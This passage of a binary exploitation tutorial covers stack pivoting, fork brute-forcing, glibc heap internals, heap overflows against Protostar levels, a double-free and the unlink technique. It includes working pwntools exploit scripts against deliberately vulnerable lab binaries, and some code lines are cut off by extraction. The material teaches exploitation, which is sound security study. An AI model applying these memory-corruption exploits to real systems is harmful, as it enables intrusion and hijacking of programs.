incredibly relevant because in 64-bit the \x7f is almost always present in glibc
addresses, so it's not quite so possible to avoid (although you could keep rerunning the
exploit until the rare occasion you get an 0x7e... libc base).

To bypass this we use the socat pty escape character \x16 and prepend it to any
\x7f we send across. 142/240
4/10/24, 12:28 PM Binary Exploitation

Forking Processes
Flaws with fork()

Some processes use fork() to deal with multiple requests at once, most notably

An interesting side-effect of fork() is that memory is copied exactly. This means

everything is identical - ELF base, libc base, canaries.

This "shared" memory is interesting from an attacking point of view as it allows us to do

a byte-by-byte bruteforce. Simply put, if there is a response from the server when we
send a message, we can work out when it crashed. We keep spamming bytes until
there's a response. If the server crashes, the byte is wrong. If not, it's correct.

This allows us to bruteforce the RIP one byte at a time, essentially leaking PIE - and the
same thing for canaries and RBP. 24 bytes of multithreaded bruteforce, and once you
leak all of those you can bypass a canary, get a stack leak from RBP and PIE base from

I won't be making a binary for this (yet), but you can check out ippsec's Rope writeup
for HTB - Rope root was this exact technique. 143/240
4/10/24, 12:28 PM Binary Exploitation

Stack Pivoting
Lack of space for ROP

Stack Pivoting is a technique we use when we lack space on the stack - for example, we
have 16 bytes past RIP. In this scenario, we're not able to complete a full ROP chain.

During Stack Pivoting, we take control of the RSP register and "fake" the location of
the stack. There are a few ways to do this.

pop rsp gadget

Possibly the simplest, but also the least likely to exist. If there is one of these, you're
quite lucky.

xchg <reg>, rsp

If you can find a pop <reg> gadget, you can then use this xchg gadget to swap the
values with the ones in RSP. Requires about 16 bytes of stack space after the saved
return pointer:

pop <reg> <=== return pointer

<reg value>
xchg <rag>, rsp

leave; ret

This is a very interesting way of stack pivoting, and it only requires 8 bytes.

Every function (except main ) is ended with a leave; ret gadget. leave is
equivalent to 144/240
4/10/24, 12:28 PM Binary Exploitation

mov rsp, rbp

pop rbp

Note that the function ending therefore looks like

mov rsp, rbp

pop rbp
pop rip

That means that when we overwrite RIP the 8 bytes before that overwrite RBP (you
may have noticed this before). So, cool - we can overwrite rbp using leave . How
does that help us?

Well if we look at leave again, we noticed the value in RBP gets moved to RSP! So if
we call overwrite RBP then overwrite RIP with the address of leave; ret again, the
value in RBP gets moved to RSP. And, even better, we don't need any more stack space
than just overwriting RIP, making it very compressed. 145/240
4/10/24, 12:28 PM Binary Exploitation

Stack Pivoting


// gcc source.c -o vuln -no-pie

#include <stdio.h>

void winner(int a, int b) {

if(a == 0xdeadbeef && b == 0xdeadc0de) {
puts("Great job!");
puts("Whelp, almost...?");

void vuln() {
char buffer[0x60];
printf("Try pivoting to: %p\n", buffer);
fgets(buffer, 0x80, stdin);

int main() {
return 0;

It's fairly clear what the aim is - call winner() with the two correct parameters. The
fgets() means there's a limited number of bytes we can overflow, and it's not
enough for a regular ROP chain. There's also a leak to the start of the buffer, so we
know where to set RSP to.

We'll try two ways - using pop rsp , and using leave; ret . There's no xchg gadget,
but it's virtually identical to just popping RSP anyway. 146/240
4/10/24, 12:28 PM Binary Exploitation

Since I assume you know how to calculate padding, I'll tell you there's 96 until we
overwrite stored RBP and 104 (as expected) until stored RIP.

Basic Setup

Just to get the basics out of the way, as this is common to both approaches:

from pwn import *

elf = context.binary = ELF('./vuln')

p = process()

p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}') 147/240
4/10/24, 12:28 PM Binary Exploitation

pop rsp
Using a pop rsp gadget to stack pivot



FIrst off, let's grab all the gadgets. I'll use ROPgadget again to do so:

$ ROPgadget --binary vuln | grep 'pop rsp'

0x0000000000401225 : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret

$ ROPgadget --binary vuln | grep 'pop rdi'

0x000000000040122b : pop rdi ; ret

$ ROPgadget --binary vuln | grep 'pop rsi'

0x0000000000401229 : pop rsi ; pop r15 ; ret

Now we have all the gadgets, let's chuck them into the script:

POP_CHAIN = 0x401225 # RSP, R13, R14, R15, ret

POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229

Testing the pop

Let's just make sure the pop works by sending a basic chain and then breaking on ret
and stepping through. 148/240
4/10/24, 12:28 PM Binary Exploitation

payload = flat(
'A' * 104,
0, # r13
0, # r14
0 # r15


If you're careful, you may notice the mistake here, but I'll point it out in a sec. Send it
off, attach r2.

$r2 -d -A $(pidof vuln)

[0x7f96f01e9dee]> db 0x004011b8
[0x7f96f01e9dee]> dc
hit breakpoint at: 4011b8
[0x004011b8]> pxq @ rsp
0x7ffce2d4fc68 0x0000000000401225 0x00007ffce2d4fc00
0x7ffce2d4fc78 0x0000000000000000 0x00007ffce2d4fd68

You may see that only the gadget + 2 more values were written; this is because our
buffer length is limited, and this is the reason we need to stack pivot. Let's step
through the first pop .

[0x004011b8]> ds
[0x00401225]> ds
[0x00401226]> dr rsp

You may notice it's the same as our "leaked" value, so it's working. Now let's try and
pop the 0x0 into r13 .

[0x00401226]> ds
[0x00401228]> dr r13
0x4141414141414141 149/240
4/10/24, 12:28 PM Binary Exploitation

What? We passed in 0x0 to the gadget!

Remember, however, that pop r13 is equivalent to mov r13, [rsp] - the value from
the top of the stack is moved into r13 . Because we moved RSP, the top of the stack
moved to our buffer and AAAAAAAA was popped into it - because that's what the top
of the stack points to now.

Full Payload

Now we understand the intricasies of the pop, let's just finish the exploit off. To
account for the additional pop calls, we have to put some junk at the beginning of the
buffer, before we put in the ropchain.

payload = flat(
0, # r13
0, # r14
0, # r15
0x0, # r15

payload = payload.ljust(104, b'A') # pad to 104

payload += flat(
buffer # rsp - now stack points to our buffer!

Final Exploit 150/240
4/10/24, 12:28 PM Binary Exploitation

from pwn import *

elf = context.binary = ELF('./vuln')

p = process()

p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')

POP_CHAIN = 0x401225 # RSP, R13, R14, R15, ret

POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229

payload = flat(
0, # r13
0, # r14
0, # r15
0x0, # r15

payload = payload.ljust(104, b'A') # pad to 104

payload += flat(
buffer # rsp

print(p.recvline()) 151/240
4/10/24, 12:28 PM Binary Exploitation

Using leave; ret to stack pivot

By calling leave; ret twice, as described, this happens:

mov rsp, rbp

pop rbp
mov rsp, rbp
pop rbp

By controlling the value popped into RBP, we can control RSP.


As before, but with a difference:

$ ROPgadget --binary vuln | grep 'leave'

0x000000000040117c : leave ; ret

LEAVE_RET = 0x40117c
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229

Testing the leave

I won't bother stepping through it again - if you want that, check out the pop rsp
walkthrough. 152/240
4/10/24, 12:28 PM Binary Exploitation

payload = flat(
'A' * 96,


Essentially, that pops buffer into RSP (as described previously).

Full Payload

You might be tempted to just chuck the payload into the buffer and boom, RSP points
there, but you can't quite - as with the previous approach, there is a pop instruction
that needs to be accounted for - again, remember leave is

mov rsp, rbp

pop rbp

So once you overwrite RSP, you still need to give a value for the pop rbp .

payload = flat(
0x0, # account for final "pop rbp"
0x0, # r15

payload = payload.ljust(96, b'A') # pad to 96 (just get to RBP)

payload += flat(
) 153/240
4/10/24, 12:28 PM Binary Exploitation

Final Exploit
from pwn import *

elf = context.binary = ELF('./vuln')

p = process()

p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')

LEAVE_RET = 0x40117c
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229

payload = flat(
0x0, # rbp

payload = payload.ljust(96, b'A') # pad to 96 (just get to RBP)

payload += flat(

print(p.recvline()) 154/240
4/10/24, 12:28 PM Binary Exploitation

Still learning :)

Moving onto heap exploitation does not require you to be a god at stack
exploitation, but it will require a better understanding of C and how concepts such as
pointers work. From time to time we will be discussing the glibc source code itself, and
while this can be really overwhelming, it's incredibly good practise.

I'll do everything I can do make it as simple as possible. Most references (to start with)
will be hyperlinks, so feel free to just keep the concept in mind for now, but as you
progress understanding the source will become more and more important.

Occasionally different snippets of code will be from different glibc versions, and I'll do my
best to note down which version they are from. The reason for this is that newer versions
have a lot of protections that will obscure the basic logic of the operation, so we will start
with older implementations and build up. 155/240
4/10/24, 12:28 PM Binary Exploitation

Introduction to the Heap

Unlike the stack, heap is an area of memory that can be dynamically allocated. This
means that when you need new space, you can "request" more from the heap.

In C, this often means using functions such as malloc() to request the space.
However, the heap is very slow and can take up tons of space. This means that the
developer has to tell libc when the heap data is "finished with", and it does this via calls
to free() which mark the area as available. But where there are humans there will be
implementation flaws, and no amount of protection will ever ensure code is completely

In the following sections, we will only discuss 64-bit systems (with the exception of
some parts that were written long ago). The theory is the same, but pretty much any
heap challenge (or real-world application) will be on 64-bit systems. 156/240
4/10/24, 12:28 PM Binary Exploitation

Internally, every chunk - whether allocated or free - is stored in a malloc_chunk
structure. The difference is how the memory space is used.

Allocated Chunks
When space is allocated from the heap using a function such as malloc() , a pointer to
a heap address is returned. Every chunk has additional metadata that it has to store in
both its used and free states.

The chunk has two sections - the metadata of the chunk (information about the chunk)
and the user data, where the data is actually stored.

The size field is the overall size of the chunk, including metadata. It must be a
multiple of 8 , meaning the last 3 bits of the size are 0 . This allows the flags A ,
M and P to take up that space, with M being the 3rd-last bit of size , A the
2nd-last and P the last.

The flags have special uses: 157/240
4/10/24, 12:28 PM Binary Exploitation

P is the PREV_INUSE flag, which is set when the previous adjacent chunk (the
chunk ahead) is in use

M is the IS_MMAPPED flag, which is set when the chunk is allocated via mmap()
rather than a heap mechanism such as malloc()

A is the NON_MAIN_ARENA flag, which is set when the chunk is not located in
main_arena ; we will get to Arenas in a later section, but in essence every created
thread is provided a different arena (up to a limit) and chunks in these arenas have
the A bit set

prev_size is set if the previous adjacent chunk is free, as calculated by P being 0 .

If it is not, the heap saves space and prev_size is part of the previous chunk's user
data. If it is, then prev_size stores the size of the previous chunk.

Free Chunks
Free chunks have additional metadata to handle the linking between them. 158/240
4/10/24, 12:28 PM Binary Exploitation

This can be seen in the malloc_state struct:

struct malloc_chunk {
INTERNAL_SIZE_T mchunk_prev_size; /* Size of previous chunk (if f
INTERNAL_SIZE_T mchunk_size; /* Size in bytes, including ove

struct malloc_chunk* fd; /* double links -- used only if free. *

struct malloc_chunk* bk;

/* Only used for large blocks: pointer to next larger size. */

struct malloc_chunk* fd_nextsize; /* double links -- used only if free.
struct malloc_chunk* bk_nextsize;
}; 159/240
4/10/24, 12:28 PM Binary Exploitation

Freeing Chunks and the Bins

An Overview of Freeing
When we are done with a chunk's data, the data is freed using a function such as
free() . This tells glibc that we are done with this portion of memory.

In the interest of being as efficient as possible, glibc makes a lot of effort to recycle
previously-used chunks for future requests in the program. As an example, let's say we
need 100 bytes to store a string input by the user. Once we are finished with it, we tell
glibc we are no longer going to use it. Later in the program, we have to input another
100-byte string from the user. Why not reuse that same part of memory? There's no
reason not to, right?

It is the bins that are responsible for the bulk of this memory recycling. A bin is a
(doubly- or singly-linked) list of free chunks. For efficiency, different bins are used for
different sizes, and the operations will vary depending on the bins as well to keep high

When a chunk is freed, it is "moved" to the bin. This movement is not physical, but
rather a pointer - a reference to the chunk - is stored somewhere in the list.

Bin Operations
There are four bins: fastbins, the unsorted bin, smallbins and largebins.

When a chunk is freed, the function that does the bulk of the work in glibc is
_int_free() . I won't delve into the source code right now, but will provide hyperlinks
to glibc 2.3, a very old one without security checks. You should have a go at familiarising
yourself with what the code says, but bear in mind things have been moved about a bit
to get to there they are in the present day! You can change the version on the left in
bootlin to see how it's changed. 160/240
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First, the size of the chunk is checked. If it is less than the largest fastbin size, add
it to the correct fastbin

Otherwise, if it's mmapped, munmap the chunk

Finally, consolidate them and put them into the unsorted bin

What is consolidation? We'll be looking into this more concretely later, but it's
essentially the process of finding other free chunks around the chunk being freed and
combining them into one large chunk. This makes the reuse process more efficient.


Fastbins store small-sized chunks. There are 10 of these for chunks of size 16, 24, 32, 40,
48, 56, 64, 72, 80 or 88 bytes including metadata.

Unsorted Bin

There is only one of these. When small and large chunks are freed, they end of in this
bin to speed up allocation and deallocation requests.

Essentially, this bin gives the chunks one last shot at being used. Future malloc
requests, if smaller than a chunk currently in the bin, split up that chunk into two pieces
and return one of them, speeding up the process - this is the Last Remainder Chunk. If
the chunk requested is larger, then the chunks in this bin get moved to the respective
Small/Large bins.

Small Bins

There are 62 small bins of sizes 16, 24, ... , 504 bytes and, like fast bins, chunks of the
same size are stored in the same bins. Small bins are doubly-linked and allocation and
deallocation is FIFO.

The purpose of the FD and BK pointers as we saw before are to points to the chunks
ahead and behind in the bin. 161/240
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Before ending up in the unsorted bin, contiguous small chunks (small chunks next to
each other in memory) can coalesce (consolidate), meaning their sizes combine and
become a bigger chunk.

Large Bins

63 large bins, can store chunks of different sizes. The free chunks are ordered in
decreasing order of size, meaning insertions and deletions can occur at any point in the

The first 32 bins have a range of 64 bytes:

1st bin: 512 - 568 bytes

2nd bin: 576 - 632 bytes

Like small chunks, large chunks can coalesce together before ending up in the unsorted

Head and Tail

Each bin is represented by two values, the HEAD and TAIL . As it sounds, HEAD is at
the top and TAIL at the bottom. Most insertions happen at the HEAD , so in LIFO
structures (such as the fastbins) reallocation occurs there too, whereas in FIFO
structures (such as small bins) reallocation occurs at the TAIL . For fastbins, the TAIL
is null . 162/240
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Operations of the Fastbin

Fastbins are a singly-linked list of chunks. The point of these is that very small chunks
are reused quickly and efficiently. To aid this, chunks of fastbin size do not consolidate
(they are not absorbed into surrounding free chunks once freed).

A fastbin is a LIFO (Last-In-First-Out) structure, which means the last chunk to be added
to the bin is the first chunk to come out of it. Glibc only keeps track of the HEAD, which
points to the first chunk in the list (and is set to 0 if the fastbin is empty). Every chunk
in the fastbin has an fd pointer, which points to the next chunk in the bin (or is 0 if it
is the last chunk).

When a new chunk is freed, it's added at the front of the list (making it the head):

The fd of the newly-freed chunk is overwritten to point at the old head of the list

HEAD is updated to point to this new chunk, setting the new chunk as the head of
the list

Let's have a visual demonstration (it will help)! Try out the following C program: 163/240
4/10/24, 12:28 PM Binary Exploitation

#include <stdio.h>
#include <stdlib.h>

int main() {
char *a = malloc(20);
char *b = malloc(20);
char *c = malloc(20);

printf("a: %p\nb: %p\nc: %p\n", a, b, c);




char *d = malloc(20);
char *e = malloc(20);
char *f = malloc(20);

printf("d: %p\ne: %p\nf: %p\n", d, e, f);


We get:

a: 0x2292010
b: 0x2292030
c: 0x2292050
d: 0x2292050
e: 0x2292030
f: 0x2292010

As you can see, the chunk a gets reassigned to chunk f , b to e and c to d .

So, if we free() a chunk, there's a good chance our next malloc() - if it's of the
same size - will use the same chunk. 164/240
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It can be really confusing as to why we add and remove chunks from the start of the list
(why not the end?), but it's really just the most efficient way to add an element. Let's
say we have this fastbin setup:

HEAD --> a -> b

In this case HEAD points to a , and a points onwards to b as the next chunk in the
bin (because the fd field of a points to b ). Now let's say we free another chunk
c . If we want to add it to the end of the list like so:

HEAD --> a -> b -> c

We would have to update the fd pointer of b to point at c . But remember that

glibc only keeps track of the first chunk in the list - it only has the HEAD stored. It has
no information about the end of this list, which could be many chunks long. This means
that to add c in at the end, it would first have to start at the head and traverse
through the entire list until it got to the last chunk, then overwrite the fd field of the
last chunk to point at c and make c the last chunk.

Meanwhile, if it adds at the HEAD:

HEAD --> c -> a -> b

All we need to do is: 165/240
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Set the fd of c to point at a

This is easy, as a was the old head, so glibc had a pointer to it stored already
HEAD is then updated to c , making it the head of the list

This is also easy, as the pointer to c is freely available

This has much less overhead!

For reallocating the chunk, the same principle applies - it's much easier to update HEAD
to point to a by reading the fd of c than it is to traverse the entire list until it gets
to the end. 166/240
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Operations of the Unsorted Bin

When a non-fast chunk is freed, it gets put into the Unsorted Bin. When new chunks are
requested, glibc looks at the unsorted bin.

If the requested size is equal to the size of the chunk in the bin, return the chunk
If it's smaller, split the chunk in the bin in two and return a portion of the correct size

TODO 167/240
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Malloc State 168/240
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Heap Overflow
Heap Overflow, much like a Stack Overflow, involves too much data being written to
the heap. This can result in us overwriting data, most importantly pointers. Overwriting
these pointers can cause user input to be copied to different locations if the program
blindly trusts data on the heap.

To introduce this (it's easier to understand with an example) I will use two vulnerable
binaries from Protostar. 169/240
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Luckily it gives us the source: 170/240
4/10/24, 12:28 PM Binary Exploitation

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

struct data {
char name[64];

struct fp {
void (*fp)();
char __pad[64 - sizeof(unsigned long)];

void winner() {
printf("Congratulations, you have passed this level\n");

void nowinner() {
"level has not been passed - function pointer has not been "

int main(int argc, char **argv) {

struct data *d;
struct fp *f;

if (argc < 2) {
printf("Please specify an argument to copy :-)\n");

d = malloc(sizeof(struct data));
f = malloc(sizeof(struct fp));
f->fp = nowinner;

strcpy(d->name, argv[1]);

printf("data is at %p, fp is at %p, will be calling %p\n", d, f, f->fp)



return 0;
} 171/240
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So let's analyse what it does:

Allocates two chunks on the heap

Sets the fp variable of chunk f to the address of nowinner

Copies the first command-line argument to the name variable of the chunk d

Runs whatever the fp variable of f points at

The weakness here is clear - it runs a random address on the heap. Our input is copied
there after the value is set and there's no bound checking whatsoever, so we can
overrun it easily.

Regular Execution

Let's check out the heap in normal conditions.

$ r2 -d -A heap0 AAAAAAAAAAAA <== that's just a parameter

$ s main; pdf
0x0040075d e8fefdffff call sym.imp.strcpy ; char *strcpy
0x00400762 488b45f8 mov rax, qword [var_8h]

We'll break right after the strcpy and see how it looks.

[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x400762 172/240
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If we want, we can check the contents. 173/240
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So, we can see that the function address is there, after our input in memory. Let's work
out the offset.

Working out the Offset

Since we want to work out how many characters we need until the pointer, I'll just use a
De Bruijn Sequence.

$ ragg2 -P 200 -r

$ r2 -d -A heap0 AAABAACAADAAE...

Let's break on and after the strcpy . That way we can check the location of the
pointer then immediately read it and calculate the offset.

[0x004006f8]> db 0x0040075d
[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x40075d 174/240
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So, the chunk with the pointer is located at 0x2493060 . Let's continue until the next

[0x0040075d]> dc
hit breakpoint at: 0x400762

radare2 is nice enough to tell us we corrupted the data. Let's analyse the chunk again. 175/240
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Notice we overwrote the size field, so the chunk is much bigger. But now we can
easily use the first value to work out the offset (we could also, knowing the location,
have done pxq @ 0x02493060 ).

[0x00400762]> wopO 0x6441416341416241


So, fairly simple - 80 characters, then the address of winner .

from pwn import *

elf = context.binary = ELF('./heap0')

payload = (b'A' * 80 + flat(elf.sym['winner'])).replace(b'\x00', b'')

p = elf.process(argv=[payload])


We need to remove the null bytes because argv doesn't allow them 176/240
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#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

struct heapStructure {
int priority;
char *name;

int main(int argc, char **argv) {

struct heapStructure *i1, *i2;

i1 = malloc(sizeof(struct heapStructure));
i1->priority = 1;
i1->name = malloc(8);

i2 = malloc(sizeof(struct heapStructure));
i2->priority = 2;
i2->name = malloc(8);

strcpy(i1->name, argv[1]);
strcpy(i2->name, argv[2]);

printf("and that's a wrap folks!\n");


void winner() {
"Congratulations, you've completed this level @ %ld seconds past th
} 177/240
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This program:

Allocates a chunk on the heap for the heapStructure

Allocates another chunk on the heap for the name of that heapStructure

Repeats the process with another heapStructure

Copies the two command-line arguments to the name variables of the

Prints something

Regular Execution

Let's break on and after the first strcpy .

$ r2 -d -A heap1 AAAA BBBB

As we expected, we have two pairs of heapStructure and name chunks. We know the
strcpy will be copying into wherever name points, so let's read the contents of the 178/240
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first heapStructure . Maybe this will give us a clue.

Look! The name pointer points to the name chunk! You can see the value 0x602030
being stored.

This isn't particularly a revelation in itself - after all, we knew there was a pointer in the
chunk. But now we're certain, and we can definitely overwrite this pointer due to the
lack of bounds checking. And because we can also control the value being written, this
essentially gives us an arbitrary write!

And where better to target than the GOT?

The plan, therefore, becomes:

Pad until the location of the pointer

Overwrite the pointer with the GOT address of a function

Set the second parameter to the address of winner

Next time the function is called, it will call winner 179/240
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But what function should we overwrite? The only function called after the strcpy is
printf , according to the source code. And if we overwrite printf with winner it'll
just recursively call itself forever.

Luckily, compilers like gcc compile printf as puts if there are no parameters - we
can see this with radare2:

$ r2 -d -A heap1
$ s main; pdf
0x004006e6 e8f5fdffff call sym.imp.strcpy ; char *strcpy
0x004006eb bfa8074000 mov edi, str.and_that_s_a_wrap_folks ; 0x40
0x004006f0 e8fbfdffff call sym.imp.puts

So we can simply overwrite the GOT address of puts with winner . All we need to
find now is the padding until the pointer and then we're good to go.

$ ragg2 -P 200 -r

$ r2 -d -A heap1 AAABAA... 0000

Break on and after the strcpy again and analyse the second chunk's name pointer. 180/240
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The pointer is originally at 0x8d9050 ; once the strcpy occurs, the value there is
0x41415041414f4141 .

[0x004006cd]> wopO 0x41415041414f4141


The offset is 40.

Final Exploit

from pwn import *

elf = context.binary = ELF('./heap1', checksec=False)

param1 = (b'A' * 40 + p64(['puts'])).replace(b'\x00', b'')

param2 = p64(elf.sym['winner']).replace(b'\x00', b'')

p = elf.process(argv=[param1, param2])


Again, null bytes aren't allowed in parameters so you have to remove them. 181/240
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Much like the name suggests, this technique involves us using data once it is freed. The
weakness here is that programmers often wrongly assume that once the chunk is freed
it cannot be used and don't bother writing checks to ensure data is not freed. This
means it is possible to write data to a free chunk, which is very dangerous.

TODO: binary 182/240
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A double-free can take a bit of time to understand, but ultimately it is very simple.

Firstly, remember that for fast chunks in the fastbin, the location of the next chunk in
the bin is specified by the fd pointer. This means if chunk a points to chunk b ,
once chunk a is freed the next chunk in the bin is chunk b .

In a double-free, we attempt to control fd . By overwriting it with an arbitrary

memory address, we can tell malloc() where the next chunk is to be allocated. For
example, say we overwrote a->fd to point at 0x12345678 ; once a is free, the next
chunk on the list will be 0x12345678 .

Controlling fd
As it sounds, we have to free the chunk twice. But how does that help?

Let's watch the progress of the fastbin if we free an arbitrary chunk a twice:

char *a = malloc(0x20);
free(a); 183/240
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Fairly logical.

But what happens if we called malloc() again for the same size?

char *b = malloc(0x20);

Well, strange things would happen. a is both allocated (in the form of b ) and free
at the same time.

If you remember, the heap attempts to save as much space as possible and when the
chunk is free the fd pointer is written where the user data used to be.

But what does this mean?

When we write into the use data of b , we're writing into the fd of a at the same
time. 184/240
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And remember - controlling fd means we can control where the next chunk gets

So we can write an address into the data of b , and that's where the next chunk gets

strcpy(b, "\x78\x56\x34\x12");

Now, the next alloc will return a again. This doesn't matter, we want the one

malloc(0x20) /* This is yet another 'a', we can ignor

char *controlled = malloc(0x20); /* This is in the location we want */

Boom - an arbitrary write. 185/240
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Double-Free Protections
It wouldn't be fun if there were no protections, right?

Using Xenial Xerus, try running:

#include <stdio.h>
#include <stdlib.h>

int main() {
int *a = malloc(0x50);


return 1;

Notice that it throws an error.

Double Free or Corruption (Fasttop)

Is the chunk at the top of the bin the same as the chunk being inserted?

For example, the following code still works:

#include <stdio.h>
#include <stdlib.h>

int main() {
int *a = malloc(0x50);
int *b = malloc(0x50);


return 1;
} 186/240
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malloc(): memory corruption (fast)

When removing the chunk from a fastbin, make sure the size falls into the fastbin's

The previous protection could be bypassed by freeing another chunk in between the
double-free and just doing a bit more work that way, but then you fall into this trap.

Namely, if you overwrite fd with something like 0x08041234 , you have to make sure
the metadata fits - i.e. the size ahead of the data is completely correct - and that makes
it harder, because you can't just write into the GOT, unless you get lucky. 187/240
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Double-Free Exploit
Still on Xenial Xerus, means both mentioned checks are still relevant. The bypass for
the second check (malloc() memory corruption) is given to you in the form of fake
metadata already set to a suitable size. Let's check the (relevant parts of) the source.



char fakemetadata[0x10] = "\x30\0\0\0\0\0\0\0"; // so we can ignore the "w

char admin[0x10] = "Nuh-huh\0";

// List of users to keep track of

char *users[15];
int userCount = 0;

The fakemetadata variable is the fake size of 0x30 , so you can focus on the double-
free itself rather than the protection bypass. Directly after this is the admin variable,
meaning if you pull the exploit off into the location of that fake metadata, you can just
overwrite that as proof.

users is a list of strings for the usernames, and userCount keeps track of the length
of the array.

main_loop() 188/240
4/10/24, 12:28 PM Binary Exploitation

void main_loop() {
while(1) {
printf(">> ");

char input[2];
read(0, input, sizeof(input));
int choice = atoi(input);

switch (choice)
case 1:
case 2:
case 3:

Prompts for input, takes in input. Note that main() itself prints out the location of
fakemetadata , so we don't have to mess around with that at all.


void createUser() {
char *name = malloc(0x20);
users[userCount] = name;

printf("%s", "Name: ");

read(0, name, 0x20);

printf("User Index: %d\nName: %s\nLocation: %p\n", userCount, users[u


createUser() allocates a chunk of size 0x20 on the heap (real size is 0x30 including
metadata, hence the fakemetadata being 0x30 ) then sets the array entry as a 189/240
4/10/24, 12:28 PM Binary Exploitation

pointer to that chunk. Input then gets written there.


void deleteUser() {
printf("Index: ");

char input[2];
read(0, input, sizeof(input));
int choice = atoi(input);

char *name = users[choice];

printf("User %d:\n\tName: %s\n", choice, name, name);

// Check user actually exists before freeing

if(choice < 0 || choice >= userCount) {
puts("Invalid Index!");
else {
puts("User freed!");

Get index, print out the details and free() it. Easy peasy.


void complete_level() {
if(strcmp(admin, "admin\n")) {
puts("Level Complete!");

Checks you overwrote admin with admin , if you did, mission accomplished! 190/240
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There's literally no checks in place so we have a plethora of options available, but this
tutorial is about using a double-free, so we'll use that.


First let's make a skeleton of a script, along with some helper functions:

from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)

p = process()

def create(name='a'):
p.sendlineafter('>> ', '1')
p.sendlineafter('Name: ', name)

def delete(idx):
p.sendlineafter('>> ', '2')
p.sendlineafter('Index: ', str(idx))

def complete():
p.sendlineafter('>> ', '3')

Finding the Double-Free

As we know with the fasttop protection, we can't allocate once then free twice - we'll
have to free once inbetween.

delete(0) 191/240
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Let's check the progression of the fastbin by adding a pause() after every delete() .
We'll hook on with radare2 using

r2 -d $(pidof vuln)

delete(0) #1

Due to its size, the chunk will go into Fastbin 2, which we can check the contents of
using dmhf 2 ( dmhf analyses fastbins, and we can specify number 2).

Looks like the first chunk is located at 0xd58000 . Let's keep going.

delete(1) 192/240
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The next chunk (Chunk 1) has been added to the top of the fastbin, this chunk being
located at 0xd58030 .

delete(0) #2

Boom - we free Chunk 0 again, adding it to the fastbin for the second time. radare2 is
nice enough to point out there's a double-free.

Writing to the Fastbin Freelist

Now we have a double-free, let's allocate Chunk 0 again and put some random data.
Because it's also considered free, the data we write is seen as being in the fd pointer
of the chunk. Remember, the heap saves space, so fd when free is located exactly
where data is when allocated (probably explained better here). 193/240
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So let's write to fd , and see what happens to the fastbin. Remove all the pause()


Run, debug, and dmhf 2 .

The last free() gets reused, and our "fake" fastbin location is in the list. Beautiful.

Let's push it to the top of the list by creating two more irrelevant users. We can also
parse the fakemetadata location at the beginning of the exploit chain.

p.recvuntil('data: ')
fake_metadata = int(p.recvline(), 16) - 8

log.success('Fake Metadata: ' + hex(fake_metadata))


pause() 194/240
4/10/24, 12:28 PM Binary Exploitation

The reason we have to subtract 8 off fakemetadata is that the only thing we faked in
the souce is the size field, but prev_size is at the very front of the chunk metadata.
If we point the fastbin freelist at the fakemetadata variable it'll interpret it as
prev_size and the 8 bytes afterwards as size , so we shift it all back 8 to align it

Now we can control where we write, and we know where to write to.

Getting the Arbitrary Write

First, let's replace the location we write to with where we want to:


Now let's finish it off by creating another user. Since we control the fastbin, this user
gets written to the location of our fake metadata, giving us an almost arbitrary write.

create('\x00' * 8 + 'admin\x00')
complete() 195/240
4/10/24, 12:28 PM Binary Exploitation

The 8 null bytes are padding. If you read the source, you notice the metadata string is 16
bytes long rather than 8, so we need 8 more padding.

$ python3
[+] Starting local process 'vuln': pid 8296
[+] Fake Metadata: 0x602088
b'Level Complete!\n'

Awesome - we completed the level!

Final Exploit 196/240
4/10/24, 12:28 PM Binary Exploitation

from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)

p = process()

def create(name='a'):
p.sendlineafter('>> ', '1')
p.sendlineafter('Name: ', name)

def delete(idx):
p.sendlineafter('>> ', '2')
p.sendlineafter('Index: ', str(idx))

def complete():
p.sendlineafter('>> ', '3')

p.recvuntil('data: ')
fake_metadata = int(p.recvline(), 16) - 8

log.success('Fake Metadata: ' + hex(fake_metadata))



create('\x00' * 8 + 'admin\x00')

Mixing it up a bit - you can try the 32-bit version yourself. Same principle, offsets a bit
different and stuff. I'll upload the binary when I can, but just compile it as 32-bit and try
it yourself :) 197/240
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Unlink Exploit

When a chunk is removed from a bin, unlink() is called on the chunk. The unlink
macro looks like this:

FD = P->fd; /* forward chunk */

BK = P->bk; /* backward chunk */

FD->bk = BK; /* update forward chunk's bk pointer */

BK->fd = FD; /* updated backward chunk's fd pointer */

Note how fd and bk are written to location depending on fd and bk - if we control

both fd and bk , we can get an arbitrary write.

Consider the following example:

We want to write the value 0x1000000c to 0x5655578c . If we had the ability to create
a fake free chunk, we could choose the values for fd and bk . In this example, we
would set fd to 0x56555780 (bear in mind the first 0x8 bytes in 32-bit would be for
the metadata, so P->fd is actually 8 bytes off P and P->bk is 12 bytes off) and bk
to 0x10000000 . Then when we unlink() this fake chunk, the process is as follows:

FD = P->fd (= 0x56555780)
BK = P->bk (= 0x10000000)

FD->bk = BK (0x56555780 + 0xc = 0x10000000)

BK->fd = FD (0x10000000 + 0x8 = 0x56555780)

This may seem like a lot to take in. It's a lot of seemingly random numbers. What you
need to understand is P->fd just means 8 bytes off P and P->bk just means 12
bytes off P .

If you imagine the chunk looking like 198/240
4/10/24, 12:28 PM Binary Exploitation

Then the fd and bk pointers point at the start of the chunk - prev_size . So when
overwriting the fd pointer here:

FD->bk = BK (0x56555780 + 0xc = 0x10000000)

FD points to 0x56555780 , and then 0xc gets added on for bk , making the write
actually occur at 0x5655578c , which is what we wanted. That is why we fake fd and
bk values lower than the actual intended write location.

In 64-bit, all the chunk data takes up 0x8 bytes each, so the offsets for fd and bk will
be 0x10 and 0x18 respectively.

The slight issue with the unlink exploit is not only does fd get written to where you
want, bk gets written as well - and if the location you are writing either of these to is
